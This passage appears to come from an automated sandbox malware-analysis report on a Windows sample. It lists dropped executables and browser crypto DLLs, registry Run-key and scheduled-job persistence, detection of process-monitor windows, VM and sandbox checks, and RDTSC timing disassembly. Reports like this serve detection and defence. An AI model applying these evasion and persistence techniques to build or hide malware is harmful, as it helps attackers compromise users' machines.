Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5576D6 second address: 5576F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F40B515FC06h 0x0000000b jmp 00007F40B515FC00h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5576F1 second address: 557705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 557705 second address: 557725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F40B515FBFDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F40B515FC18h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 557725 second address: 557729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54EFFC second address: 54F008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F008 second address: 54F00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F00C second address: 54F010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
